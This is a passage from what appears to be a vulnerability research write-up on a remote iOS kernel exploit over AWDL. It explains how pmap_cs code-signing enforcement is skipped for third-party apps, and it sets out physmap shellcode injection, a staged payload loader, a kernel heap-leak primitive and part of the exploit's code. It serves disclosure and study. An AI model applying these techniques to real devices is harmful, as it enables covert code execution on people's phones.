PPL uses APRR to dynamically switch the page protections of two kernel regions, a text region containing code and a data region. Usually the PPL text region is not executable and the PPL data region is not writable. Important data structures have been moved into this PPL data region, including page tables and pmaps (the abstraction layer above page tables). All the code which modifies objects inside PPL data has been moved inside the PPL text segment.

But if the PPL text is non-executable, how can you run the code to modify the PPL data regions? And how can you make them writable?

The only way to execute the code inside the PPL text region is to go through a trampoline function which flips the APRR register bits to make the PPL text region executable and the PPL data region writable before jumping to the requested ppl_routine. Obviously great care has to be taken to ensure only code inside PPL text runs in this state.

Brandon likened this to a "kernel inside the kernel" which is a good way to look at it. Changes to page tables and pmaps are only meant to happen by the kernel making "PPL syscalls" to request the changes, with the implementation of those PPL syscalls being inside the PPL text region. Check out Brandon's blog post for discussion of how to exploit a vulnerability in the PPL code to make those changes anyway!

It turns out that it's not just page tables and pmaps which PPL protects. Reversing more of the PPL routines, there is a section of them starting around routine 38 which implement a new model of codesigning enforcement called pmap_cs.

Indeed, this pmap_cs string appears in the released XNU source, though attempts have been made to strip as much of the PPL related code as possible from the open source release. The vm_map_entry structure has this new field:

  /* boolean_t */ pmap_cs_associated:1, /* pmap_cs will validate */

From this code snippet from vm_fault.c it's pretty clear that pmap_cs is a new way to verify code signatures:

#if PMAP_CS
  if (fault_info->pmap_cs_associated &&
       pmap_cs_enforced(pmap) &&
       !m->vmp_cs_validated &&
       !m->vmp_cs_tainted &&
       !m->vmp_cs_nx &&
       (prot & VM_PROT_EXECUTE) &&
       (caller_prot & VM_PROT_EXECUTE)) {
         /*
          * With pmap_cs, the pmap layer will validate the
          * code signature for any executable pmap mapping.
          * No need for us to validate this page too:
          * in pmap_cs we trust...
          */
          vm_cs_defer_to_pmap_cs++;
  } else {
    vm_cs_defer_to_pmap_cs_not++;
    vm_page_validate_cs(m);
  }
#else /* PMAP_CS */
  vm_page_validate_cs(m);
#endif /* PMAP_CS */

vm_page_validate_cs is the old code-signing enforcement code, which could be easily tricked into allowing shellcode by changing the codesigning enforcement flags in the task's proc structure. The question is: what determines whether the new pmap_cs model or the old approach is used?
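The condition in the vm_fault.c snippet can be restated as a small predicate, which makes it easier to see which inputs push a page fault onto the old path. This is a direct transliteration of the boolean expression shown above for illustration; the function name and the string labels are made up, and it says nothing about what pmap_cs itself then checks.

```python
def code_signing_path(pmap_cs_associated, pmap_cs_enforced, cs_validated,
                      cs_tainted, cs_nx, prot_execute, caller_prot_execute):
    """Return which validator handles the page, per the vm_fault.c condition.

    "pmap_cs" means validation is deferred to the pmap layer;
    "vm_page_validate_cs" means the old enforcement code runs.
    """
    defer = (pmap_cs_associated and pmap_cs_enforced
             and not cs_validated and not cs_tainted and not cs_nx
             and prot_execute and caller_prot_execute)
    return "pmap_cs" if defer else "vm_page_validate_cs"
```

In particular, if `pmap_cs_enforced` is false for a given pmap, every executable fault in that process falls through to vm_page_validate_cs regardless of the other flags.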

The fundamental question I’m trying to answer is why the physmap shellcode injection technique works for a test app I’m debugging, but not a system process, even when the system process’s code signing flags have been modified such that it should be allowed to run unsigned code?

We can see a reference to pmap_cs_enforced in the snippet above, but the definition of this method is stripped from the released XNU source code. With IDA we can see it’s checking the byte at offset +0x108 in the pmap structure. Nowhere in the XNU code appears to manipulate this field though.

Reversing the pmap_cs PPL code we find that this field is referenced in pmap_cs_associate_internal_options, called by PPL routine 44.

This function has some helpful logging strings from which we can learn that it’s being called to associate a code-signing structure with a virtual memory region. This code signing structure is a pmap_cs_code_directory, and we can determine from this panic log message:

if (trust_level != 3) {
  panic("\"trying to enter a binary in nested region with too low trust level %d\"", cd_entry->trust_level);
}

that the field at +0x54 represents the “trust level” of the binary.

Further down the function we can see this:

  if ( trust_level != 1 )
    goto LABEL_38;
  pmap->pmap_cs_enforced = 0;
   ...
  return KERN_NOT_SUPPORTED;

Presumably my test apps, signed by my developer certificate, are getting this trust_level of 1 and therefore falling back to the old code-signing enforcement code. I had a hunch that maybe this also applied to third-party applications from the App Store; rather than painstakingly continuing to reverse engineer pmap_cs, I just tried installing and running an App Store app (in this case, YouTube) on the phone, then using oob_timestamp to dump the pmap structures for each running process. Indeed, there were three pmaps with pmap_cs_enforced set to 0: kernel_task (not so interesting because KTRR protects the kernel TEXT segment), oob_timestamp and YouTube!
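The survey described above boils down to checking one byte in each dumped pmap. Here is a rough sketch of that check over ordinary buffers, assuming the dumps have already been captured somehow. The `pmap_dump` record and both function names are hypothetical; only the +0x108 offset comes from the reversing above.

```c
#include <stddef.h>
#include <stdint.h>

#define PMAP_CS_ENFORCED_OFFSET 0x108 /* offset reported in the text */

/* Hypothetical record: a process name plus a raw copy of its pmap. */
struct pmap_dump {
    const char *name;
    const uint8_t *bytes; /* raw pmap contents */
    size_t len;           /* number of bytes captured */
};

/* Returns 1 if the enforcement byte is zero, 0 if it is nonzero,
 * and -1 if the dump is too short to contain the byte. */
int pmap_cs_is_disabled(const struct pmap_dump *d) {
    if (d->bytes == NULL || d->len <= PMAP_CS_ENFORCED_OFFSET)
        return -1;
    return d->bytes[PMAP_CS_ENFORCED_OFFSET] == 0 ? 1 : 0;
}

/* Counts the dumps whose enforcement byte is zero and stores the index
 * of each one in out, writing at most out_cap entries. */
size_t find_unenforced(const struct pmap_dump *dumps, size_t n,
                       size_t *out, size_t out_cap) {
    size_t found = 0;
    for (size_t i = 0; i < n; i++) {
        if (pmap_cs_is_disabled(&dumps[i]) == 1) {
            if (found < out_cap)
                out[found] = i;
            found++;
        }
    }
    return found;
}
```

Run over one dump per process, this would single out the same kind of entries as the three pmaps listed above.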

This means that we can use the remote kernel read/write to inject shellcode into any third-party app running on the device. Of course, we don’t want the prerequisite that the target must be running a third-party application, so we can use the technique developed earlier to launch the calculator to instead spawn a third-party app. If the device doesn’t have any third-party applications installed this technique wouldn’t work, but we’ve already got kernel memory read/write so there are plenty more avenues available for running code in some form on the device. But for now, we’ll assume the target device has at least 1 App Store app installed.

Our arbitrary write is fairly fast but still too slow for us to use it to write an entire payload into the physmap that way. Instead, let’s build a staged loader.

We’ll try to write a minimal piece of initial shellcode via the physmap which will be run as the bad signal handler. Its only purpose will be to bootstrap a larger payload and jump to it. The idea will be to place fragments of our final payload in kernel memory which the bootstrap code will find, copy into userspace, make executable and jump to.
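To make the staging idea a little more concrete, here is a sketch of just the reassembly step, working on ordinary buffers. The fragment layout (an explicit offset and length per piece) is my assumption for illustration and is not taken from the exploit; locating the fragments, making the result executable and jumping to it are deliberately left out.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical fragment record: where the piece belongs and its bytes. */
struct fragment {
    uint32_t offset;     /* position of this piece in the final payload */
    uint32_t len;        /* number of bytes in data */
    const uint8_t *data;
};

/* Copies each fragment into dst at its offset. Returns 0 on success and
 * -1 if a fragment falls outside dst or the fragment lengths do not add
 * up to total_len. The coverage check assumes fragments do not overlap. */
int assemble_payload(uint8_t *dst, size_t total_len,
                     const struct fragment *frags, size_t n) {
    size_t covered = 0;
    for (size_t i = 0; i < n; i++) {
        const struct fragment *f = &frags[i];
        if (f->offset > total_len || f->len > total_len - f->offset)
            return -1;
        memcpy(dst + f->offset, f->data, f->len);
        covered += f->len;
    }
    return covered == total_len ? 0 : -1;
}
```

Because each piece carries its own offset, the pieces can be found and copied in any order, which suits fragments that were staged independently of each other.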

Earlier I discussed the service_response technique for building a heap groom. I noted that this was an almost perfect heap grooming primitive: we control the size of the allocations and can also place arbitrary bytes at arbitrary offsets inside them. I also noted that it seemed like it might be a true memory leak as even when the AWDL interface is disabled, the memory never gets freed.

This also seems like a great primitive for staging our payload. All we need to do is figure out the address of the leaked memory.

The parser for the service response TLV (type 2) which causes the memory leak wraps the kalloc’ed buffer in an IO80211ServiceRequestDescriptor object. The pointer to the buffer is at offset +0x40 in there.

The IO80211ServiceRequestDescriptor is then enqueued into an IO80211CommandQueue in the IO80211AWDLPeerManager at +0x2968 which I’ve called response_fragments:

  peer_manager->response_fragments->lockEnqueue(response)

The lockEnqueue method calls ::enqueue, which adds the new element at the head of the queue’s linked list if either of the two following checks pass:

if ( this->max_elems_per_bucket == 0x1000000 ||
     this->max_elems_per_bucket * this->num_buckets > this->count )

If these checks fail, the enqueue method returns an error, but the processServiceResponseTLV method never checks this error. The reason we get a true memory leak here is that the peer_manager’s response_fragments queue is created with max_elems_per_bucket set to 8, meaning that after 8 incomplete fragments have arrived no more will be enqueued. The service response code doesn’t handle this case and the return value of lockEnqueue is never checked. The code no longer has a pointer to the RequestDescriptor and it can’t be freed. This is in many ways convenient for the heap groom, but not at all convenient when we want to know the address of the allocation!
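The capacity check and the ignored return value can be modelled in a few lines. This is a simplified stand-in rather than the real queue: the struct layout and function names are hypothetical, the 64-bit multiplication is my choice to avoid overflow in the model, and the single bucket used in the example afterwards is an assumption, since the text only gives max_elems_per_bucket.

```c
#include <stdint.h>

#define UNLIMITED_SENTINEL 0x1000000u /* value tested in the check above */

/* Simplified stand-in for the command queue; not the real layout. */
struct model_queue {
    uint32_t max_elems_per_bucket;
    uint32_t num_buckets;
    uint32_t count;
};

/* Mirrors the capacity check: returns 0 if the element is accepted
 * and -1 if the queue is considered full. */
int model_enqueue(struct model_queue *q) {
    if (q->max_elems_per_bucket == UNLIMITED_SENTINEL ||
        (uint64_t)q->max_elems_per_bucket * q->num_buckets > q->count) {
        q->count++;
        return 0;
    }
    return -1;
}

/* Models a caller that ignores the enqueue result. Returns how many of
 * n arrivals were rejected, i.e. buffers nothing points to any more. */
uint32_t model_leaked_after(struct model_queue *q, uint32_t n) {
    uint32_t leaked = 0;
    for (uint32_t i = 0; i < n; i++) {
        if (model_enqueue(q) != 0)
            leaked++; /* the real caller never notices this failure */
    }
    return leaked;
}
```

With max_elems_per_bucket set to 8 and one bucket, ten arrivals leave eight elements queued and two rejected; those two correspond to the unreachable allocations.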

Using the arbitrary write we can increase the queue limit to a much larger value, and now our code works and we can, with just a few frames, place controlled buffers of up to around 1000 bytes in kernel memory and find their addresses by parsing the queue structure. Here’s the wrapper function for this functionality in the exploit:

uint16_t kmem_leak_peer_id = 0;

uint64_t
copy_buffer_to_kmem(void* buf,
                    size_t len,
                    uint16_t kalloc_size,
                    uint16_t offset) {
  struct ether_addr kmem_leak_peer =
    *(ether_aton("22:99:33:71:00:00"));
  /* overwrite the last two bytes of the MAC so each call uses a fresh peer */
  *(((uint16_t*)&kmem_leak_peer)+2) = kmem_leak_peer_id++;

  inject(RT(),
      WIFI(kl_parm.dst, kmem_leak_peer),
      AWDL(),
      SY
